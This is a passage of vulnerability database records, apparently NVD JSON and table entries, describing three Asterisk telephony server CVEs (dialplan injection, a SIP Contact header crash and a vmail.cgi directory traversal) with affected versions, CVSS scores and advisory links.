              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "0C1A8352-DE70-4D4E-BC4D-8EABE5431646",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "615D7356-E9DD-4149-B1BE-D3C3475A8841",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "0628E34F-1A60-416D-A29C-EA28E8CC2430",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "5F54511A-A2A9-4038-9D7D-2283A6709DB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The design of the dialplan functionality in Asterisk Open Source 1.2.x, 1.4.x, and 1.6.x; and Asterisk Business Edition B.x.x and C.x.x, when using the ${EXTEN} channel variable and wildcard pattern matches, allows context-dependent attackers to inject strings into the dialplan using metacharacters that are injected when the variable is expanded, as demonstrated using the Dial application to process a crafted SIP INVITE message that adds an unintended outgoing channel leg.  NOTE: it could be argued that this is not a vulnerability in Asterisk, but a class of vulnerabilities that can occur in any program that uses this feature without the associated filtering functionality that is already available."
    },
    {
      "lang": "es",
      "value": "El dise\u00f1o de la funcionalidad dialplan en Asterisk Open Source v1.2.x, v1.4.x, y v1.6.x; y Asterisk Business Edition vB.x.x y vC.x.x,cuando se utiliza la variable de canal $ (EXTEN) y coincidencias de patron comod\u00edn, permite a atacantes dependiendo del contexto, inyectar cadenas en dialplan utilizando metacaracteres que son inyectados cuando la variable es expandida, como se demuestra utilizando la aplicaci\u00f3n Dial en un proceso en el que el mensaje SIP INVITE esta manipulado el cual a\u00f1ade un canal de salida no previsto. NOTA: Podr\u00eda argumentarse que esto no es una vulnerabilidad en Asterisk, pero hay un tipo de vulnerabilidades que pueden producirse en cualquier programa que utilice esta caracter\u00edstica sin la funcionalidad de filtrado correspondiente que actualmente esta disponible."
    }
  ],
  "id": "CVE-2010-0685",
  "lastModified": "2024-11-21T01:12:44.543",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2010-02-23T20:30:00.780",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2010-002.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/38641"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/39096"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/509608/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1023637"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2010/0439"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56397"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2010-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/38641"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/39096"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://svn.asterisk.org/svn/asterisk/branches/1.2/README-SERIOUSLY.bestpractices.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/509608/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1023637"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2010/0439"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56397"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-06-06 19:55

Modified

2024-11-21 01:27

Severity ?

Summary

reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.2 does not initialize certain strings, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed Contact header.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2011-007.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html
cve@mitre.org	http://osvdb.org/72752
cve@mitre.org	http://secunia.com/advisories/44828
cve@mitre.org	http://securitytracker.com/id?1025598
cve@mitre.org	http://www.securityfocus.com/archive/1/518236/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/48096
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/67812
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2011-007.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/72752
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44828
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025598
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/518236/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/48096
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/67812

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.2 does not initialize certain strings, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed Contact header."
    },
    {
      "lang": "es",
      "value": "reqresp_parser.c del driver del canal SIP en Asterisk Open Source v1.8.x antes de v1.8.4.2 no inicializa ciertas cadenas,lo que permite a atacantes remotos provocar una denegaci\u00f3n de servicio ( desreferenciar un puntero NULL y ca\u00edda de demonio ) a trav\u00e9s de un cabecera de contacto con formato incorrecto."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/476.html\r\n\u0027CWE-476: NULL Pointer Dereference\u0027",
  "id": "CVE-2011-2216",
  "lastModified": "2024-11-21T01:27:50.163",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-06-06T19:55:03.770",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-007.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/72752"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/44828"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1025598"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/518236/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/48096"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67812"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062658.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/062013.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/72752"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/44828"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025598"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/518236/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/48096"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67812"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2005-11-16 07:42

Modified

2024-11-21 00:02

Severity ?

Summary

Directory traversal vulnerability in vmail.cgi in Asterisk 1.0.9 through 1.2.0-beta1 allows remote attackers to access WAV files via a .. (dot dot) in the folder parameter.

References

URL	Tags
cve@mitre.org	http://osvdb.org/20577
cve@mitre.org	http://secunia.com/advisories/17459	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/19872
cve@mitre.org	http://securitytracker.com/id?1015164
cve@mitre.org	http://www.assurance.com.au/advisories/200511-asterisk.txt	Exploit, Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2006/dsa-1048
cve@mitre.org	http://www.securityfocus.com/archive/1/415990/30/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/15336
cve@mitre.org	http://www.vupen.com/english/advisories/2005/2346
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/23002
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/20577
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/17459	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19872
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1015164
af854a3a-2127-422b-91ae-364da2661108	http://www.assurance.com.au/advisories/200511-asterisk.txt	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2006/dsa-1048
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/415990/30/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/15336
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2005/2346
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/23002

Impacted products

Vendor	Product	Version
digium	asterisk	0.1.0
digium	asterisk	0.1.1
digium	asterisk	0.1.2
digium	asterisk	0.1.3
digium	asterisk	0.1.4
digium	asterisk	0.1.5
digium	asterisk	0.1.6
digium	asterisk	0.1.7
digium	asterisk	0.1.8
digium	asterisk	0.1.9
digium	asterisk	0.1.10
digium	asterisk	0.1.11
digium	asterisk	0.1.12
digium	asterisk	0.2.0
digium	asterisk	0.3.0
digium	asterisk	0.4.0
digium	asterisk	0.5.0
digium	asterisk	0.7.0
digium	asterisk	0.7.1
digium	asterisk	0.7.2
digium	asterisk	1.0.0
digium	asterisk	1.0.1
digium	asterisk	1.0.2
digium	asterisk	1.0.3
digium	asterisk	1.0.4
digium	asterisk	1.0.5
digium	asterisk	1.0.6
digium	asterisk	1.0.7
digium	asterisk	1.0.8
digium	asterisk	1.0.9
digium	asterisk	1.0_rc1
digium	asterisk	1.0_rc2
digium	asterisk	1.2.0_beta1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "864D95C2-9B1B-4EB4-82CD-3BA5E063FEED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D0FB4B52-69CA-45DA-AE22-E6667E8B98FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD8FF789-3B09-4974-B62F-CCD7F5AA2BC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "F4FA92F7-46BB-444C-ADAB-4B550CD0B69C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A003A2C3-1C4F-4A76-BABE-C55A761E3321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "A063E6CD-16F8-42E0-A9A2-4D33C10F7EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6EBC7FE3-D810-487C-8FD3-27B8729DCA41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8C08E661-23D9-437F-844F-6BE8183CF3CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D030C12-C2C6-4714-B776-2EF7ECF1A591",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE5A8210-2E7C-465C-9751-CB362AADC224",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F9DBCFB5-65BF-46FE-AC19-2557B6C0BD01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "99C185C9-9592-43A1-9811-80E16032F396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BD696CD-3B63-4C8B-966E-EE00F44CA44C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BE096C63-221B-4746-B8B6-9314C4CD6FFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24CE1C95-D4C7-4662-AD0D-5219335BAF40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9149505F-D47B-40C3-93EB-A3C647A1AC9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "94FC8F82-D648-4127-9914-27414358AC33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0CCCA63B-AB59-4827-BD6F-4AF0155151F5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16FC9C13-ADDD-4F09-B977-EE0DEF598B1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2C20296F-F70A-4D3C-A062-B6054617841C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9A92B4D-16A7-4D99-8F3A-2E5D3B12C86B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16783925-8EC5-431F-90B5-93B16DCC10B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9C59AF9E-FEC7-44AB-B392-49DB11BAEB0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "325C4452-6541-46F6-A86C-6D6987583FB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5424B5B4-99B3-4695-8E0D-7E8DC8B88C3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "62BDF9F0-1AFD-47E6-9054-A9FC6D422DD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A8D2125-019A-4B73-9E1A-98E745148803",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "3636BB44-DF4D-40AB-8EBB-1EC5D911E4A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3B3C254-29D9-4911-89A9-AC0CD9EB13F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E49F2D76-DC82-4289-8891-4982795D896A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc2:*:*:*:*:*:*:*",
              "matchCriteriaId": "203237E0-BB44-42D0-B65B-CBDAAA68A1BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Directory traversal vulnerability in vmail.cgi in Asterisk 1.0.9 through 1.2.0-beta1 allows remote attackers to access WAV files via a .. (dot dot) in the folder parameter."
    }
  ],
  "id": "CVE-2005-3559",
  "lastModified": "2024-11-21T00:02:10.953",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
